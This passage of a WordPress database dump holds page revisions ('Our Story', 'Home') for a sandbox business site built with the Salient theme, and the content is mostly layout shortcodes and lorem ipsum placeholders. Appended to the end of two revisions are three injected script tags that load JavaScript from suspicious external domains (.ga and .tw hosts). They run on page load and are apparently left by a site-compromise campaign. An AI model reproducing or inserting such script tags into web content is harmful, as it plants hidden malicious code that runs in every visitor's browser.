euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-revision-v1','','','2018-01-18 00:21:50','2018-01-18 00:21:50','',19,'https://sandbox.futuremediatrix.com/dabinter/19-revision-v1/',0,'revision','',0),(6669,1,'2018-01-29 16:00:22','2018-01-29 16:00:22','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f2f2f2\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"2%\" overlay_strength=\"0.3\" enable_shape_divider=\"true\" shape_divider_color=\"#ffffff\" shape_divider_position=\"top\" shape_divider_height=\"80\" shape_type=\"curve\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" translate_y=\"-50%\"][vc_row_inner column_margin=\"default\" translate_y=\"-100\" text_align=\"left\"][vc_column_inner column_padding=\"padding-6-percent\" column_padding_position=\"all\" centered_text=\"true\" background_color=\"#ff1053\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"medium_depth\" column_border_radius=\"15px\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Don\'t forget we blog too!\" font_container=\"tag:h3|text_align:center\" use_theme_fonts=\"yes\"][nectar_btn size=\"large\" button_style=\"see-through-2\" color_override=\"#ffffff\" hover_color_override=\"#ffffff\" hover_text_color_override=\"#000000\" icon_family=\"none\" url=\"#\" text=\"Read our posts\" margin_top=\"30\" margin_bottom=\"1\"][/vc_column_inner][vc_column_inner column_padding=\"padding-6-percent\" column_padding_position=\"all\" centered_text=\"true\" background_color=\"#3452ff\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"medium_depth\" column_border_radius=\"10px\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Ready to have a conversation? \" font_container=\"tag:h3|text_align:center\" use_theme_fonts=\"yes\"][nectar_btn size=\"large\" button_style=\"see-through-2\" color_override=\"#ffffff\" hover_color_override=\"#ffffff\" hover_text_color_override=\"#000000\" icon_family=\"none\" url=\"#\" text=\"Contact Us\" margin_top=\"30\" margin_bottom=\"1\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#d0d7dd\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#ff3a6f\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1485280135262{margin-bottom: 10px !important;}\"]\r\n<h5>Reason One</h5>\r\n[/vc_column_text][vc_custom_heading text=\"Salient can elevate your business to new heights\" font_container=\"tag:h2|font_size:44|text_align:left|color:%23ffffff|line_height:50px\" use_theme_fonts=\"yes\"][vc_column_text css=\".vc_custom_1485279924521{margin-top: 30px !important;margin-bottom: 30px !important;}\"]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color=\"#ffffff\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"x_large_depth\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text css=\".vc_custom_1485280173184{margin-bottom: 10px !important;}\"]\r\n<h5><span style=\"color: #ff3a6f;\">Reason Two</span></h5>\r\n[/vc_column_text][vc_custom_heading text=\"The ultimate WordPress theme\" font_container=\"tag:h2|font_size:44|text_align:left|color:%23ff3a6f|line_height:50px\" use_theme_fonts=\"yes\"][vc_column_text css=\".vc_custom_1485279928611{margin-top: 30px !important;margin-bottom: 30px !important;}\"]<span style=\"color: #ff3a6f;\">I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</span>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h5\" text_color=\"#ff3a6f\" link_type=\"regular\" alignment=\"left\" link_text=\"Learn More\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-29 16:00:22','2018-01-29 16:00:22','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6670,1,'2018-01-30 01:03:10','2018-01-30 01:03:10','<p>[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]</p>\n<h1>Content here</h1>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]</p>\n<h2>Text here</h2>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]</p>\n<h5>Dabinter Call Center</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]</p>\n<h5>Our Agent</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]</p>\n<h5>Contact Us</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]<br />\n<h5>Our Product</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]<br />\n<h5>Frequently Asked Question</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]<br />\n<h5>Article Area</h5>\n<p>[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]<br />\n<h2>Why Choose Us</h2>\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]</p>\n<h5></h5>\n<p>[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<h5>Hot Looks</h5>\n<p><span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" 